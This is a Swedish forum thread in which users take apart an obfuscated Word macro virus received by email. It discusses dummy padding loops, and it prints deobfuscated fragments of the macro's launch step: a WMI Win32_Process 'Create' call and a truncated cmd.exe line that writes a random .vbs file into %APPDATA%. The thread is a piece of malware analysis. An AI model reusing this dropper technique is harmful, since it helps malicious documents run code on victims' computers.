Fick ett virusdokument, koden postad här. KNÄCKT
Fick ett virusdokument, koden postad här. KNÄCKT
Fick ett worddokument i mailen i dag, naturligtvis måste det vara ett virus, så jag tänkte att på nått sätt måste man ju kunna ta reda på vad det gör.
Så jag extraherade makrot ur filen.
Men vete tusan vad det gör, men håll till godo.
Kanske någon av er kan komma på vad det hittar på.
Så jag extraherade makrot ur filen.
Men vete tusan vad det gör, men håll till godo.
Kanske någon av er kan komma på vad det hittar på.
Du har inte behörighet att öppna de filer som bifogats till detta inlägg.
Senast redigerad av TomasL 28 oktober 2016, 02:08:19, redigerad totalt 2 gånger.
- Lennart Aspenryd
- Tidigare Lasp
- Inlägg: 12607
- Blev medlem: 1 juli 2011, 19:09:09
- Ort: Helsingborg
Re: Fick ett virusdokument
Ja, förvisso, det sätter ju ihop en mycket lång sträng i slutändan, och det verkar som att D0P är en funktion som sedan körs.
Det verkar som att scriptet sätter i hop ett antal funktioner med hjälp av teckensekvenser, vilka körs på flera ställen.
Det verkar som att scriptet sätter i hop ett antal funktioner med hjälp av teckensekvenser, vilka körs på flera ställen.
Re: Fick ett virusdokument
M9d0ghB2(86) tror jag blir V, så M9d0ghB2 är int to char typ..
Arrayn BA(LRR7F) sätts, dock verkar den inte användas någonstans...
Tror mer på att du ska lösa gåtan GetObject(AntG(GZvKu, Rl))...
Arrayn BA(LRR7F) sätts, dock verkar den inte användas någonstans...
Tror mer på att du ska lösa gåtan GetObject(AntG(GZvKu, Rl))...
Re: Fick ett virusdokument
Verkar som att det är mycket dummykod, sannolikt enbart för att förvirra, som till exempel
koden innanför IFen kommer aldrig någonsin att köras, som jag tolkar det
RSYhN kommer alltid att vara 255.
Det finns väldigt många sådana här kodsekvenser.
Kod: Markera allt
UsI = 5
If UsI > 26 Then
UsI = 3
Do
UsI = UsI + 1
Loop While UsI <= 229
End If
Kod: Markera allt
RSYhN = 64
If RSYhN > 25 Then
RSYhN = 2
Do While RSYhN <= 254
RSYhN = RSYhN + 1
Loop
End If
Det finns väldigt många sådana här kodsekvenser.
Re: Fick ett virusdokument
...om loopen optimeras bort.
Annars räknar den en stund och avslutar med 255. Finns ju ingen som helst mening med att utföra detta annat än att slösa på processorkraft?
Annars räknar den en stund och avslutar med 255. Finns ju ingen som helst mening med att utföra detta annat än att slösa på processorkraft?
Re: Fick ett virusdokument
Exakt, över 60% av koden består av sådana loopar.
Gissar att det enda det går ut på är att förvirra.
Nåväl, jag har rensat bort all kod som inte gör någonting, och det har blivit lite mindre, dessutom har jag bytt ut alla slumpmässiga bokstavskombinationer i funktioner och variabler mot lite mer lättlästa namn
Gissar att det enda det går ut på är att förvirra.
Nåväl, jag har rensat bort all kod som inte gör någonting, och det har blivit lite mindre, dessutom har jag bytt ut alla slumpmässiga bokstavskombinationer i funktioner och variabler mot lite mer lättlästa namn
Du har inte behörighet att öppna de filer som bifogats till detta inlägg.
Re: Fick ett virusdokument
Själva huvuddelen av viruset ligger i SubRutin1.
Där ligger en jättesträng på runt 15000 tecken, vilken på olika "smarta" sätt mannipuleras och sätts ihop med ett antal andra strängar, för att användas som argument till två VBA-funktioner:
GetObject()
och
CallByName()
Exakt vad som händer vet jag inte riktigt ännu.
Funderar på att klistra in det hela i ett worddokument, kommentera bort VBA-anropen, singelstega igenom det hela.
Dock funderar jag på om det är tillräckligt säkert, det borde ju onekligen vara det.
Synd att man inte kan sandboxa på ett enkelt sätt, eller går det att göra i Visual Studio tro.
Där ligger en jättesträng på runt 15000 tecken, vilken på olika "smarta" sätt mannipuleras och sätts ihop med ett antal andra strängar, för att användas som argument till två VBA-funktioner:
GetObject()
och
CallByName()
Exakt vad som händer vet jag inte riktigt ännu.
Funderar på att klistra in det hela i ett worddokument, kommentera bort VBA-anropen, singelstega igenom det hela.
Dock funderar jag på om det är tillräckligt säkert, det borde ju onekligen vara det.
Synd att man inte kan sandboxa på ett enkelt sätt, eller går det att göra i Visual Studio tro.
Re: Fick ett virusdokument, koden extraherad och postad här.
Ok, då är det knäckt.
Nästan i slutet av huvudfunktionen så anropas GetObject
Bytte ut den raden med
vilket blir:
Allra sist så anropas
Blir
och
Av någon anledning får jag inte med hela vb-scriptet, verkar som att lokalfönstret är begränsat i sin utskrift.
Nåväl.
Så uppenbarligen skapas en liten process med några rader VBS-kod, vad denna gör, har jag dock inte en susning om i nuläget
Nästan i slutet av huvudfunktionen så anropas GetObject
Kod: Markera allt
Set Local18 = GetObject(Function8(LocalStr16, LocalStr17))
Kod: Markera allt
Local18 = Function8(LocalStr16, LocalStr17)
Kod: Markera allt
"winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2:Win32_Process"
DärCallByName Local18, Function8(LocalStr19, LocalStr20), 2, LocalStr21
Kod: Markera allt
Local18 = "winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2:Win32_Process"
Kod: Markera allt
Function8(LocalStr19, LocalStr20),
Kod: Markera allt
"Create"
Kod: Markera allt
LocalStr21 = "cmd.exe /V /C set "Qo6EX=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM Xkl8OKcx" "FunCTIoN NTxOffuM(Iixy)" "X2UcU=50" "NTxOffuM=CHr(Iixy)" "F7hY6Hlv=92" "End FunCtiOn" "Nmc=70" "Cd7c0C" "FunCTiON SLLfd0Wr(Ydpf3Yj8)" "OG=22" "SLLfd0Wr=AsC(Ydpf3Yj8)" "AUEV="
Nåväl.
Så uppenbarligen skapas en liten process med några rader VBS-kod, vad denna gör, har jag dock inte en susning om i nuläget
Re: Fick ett virusdokument, koden postad här. KNÄCKT
man kan kanske köra den i en isolerad virtuell burk och kolla vad som händer?
Re: Fick ett virusdokument, koden postad här. KNÄCKT
Jo, men då måste jag ha ytterligare en windows och en office licens.
- Lennart Aspenryd
- Tidigare Lasp
- Inlägg: 12607
- Blev medlem: 1 juli 2011, 19:09:09
- Ort: Helsingborg
Re: Fick ett virusdokument, koden postad här. KNÄCKT
Tack TomasL för ditt försök att bena ut det hela.
Skall bli intressant att se om någon kan singelsteppa detta i en virtuell maskin.
Men tänk så mycket pyssel för ... Vad då?
Skall bli intressant att se om någon kan singelsteppa detta i en virtuell maskin.
Men tänk så mycket pyssel för ... Vad då?
Re: Fick ett virusdokument, koden postad här. KNÄCKT
Tja, jag gissar att det är ett av dessa virus som krypterar allt, och så får du betala några tusenlappar för att få det hela upplåst.
Re: Fick ett virusdokument, koden postad här. KNÄCKT
Så det var inte ett virus för att byta din signatr på EF. Litet lustigt att där ingick så pass mycket ufyllnad, som inte gjorde nån "nytta". Men dethär var förvisso ingenting i Stuxnetklass.
Intressant dokumet, som jag såg nyligen:
http://topdocumentaryfilms.com/defeating-hackers/
Intressant dokumet, som jag såg nyligen:
http://topdocumentaryfilms.com/defeating-hackers/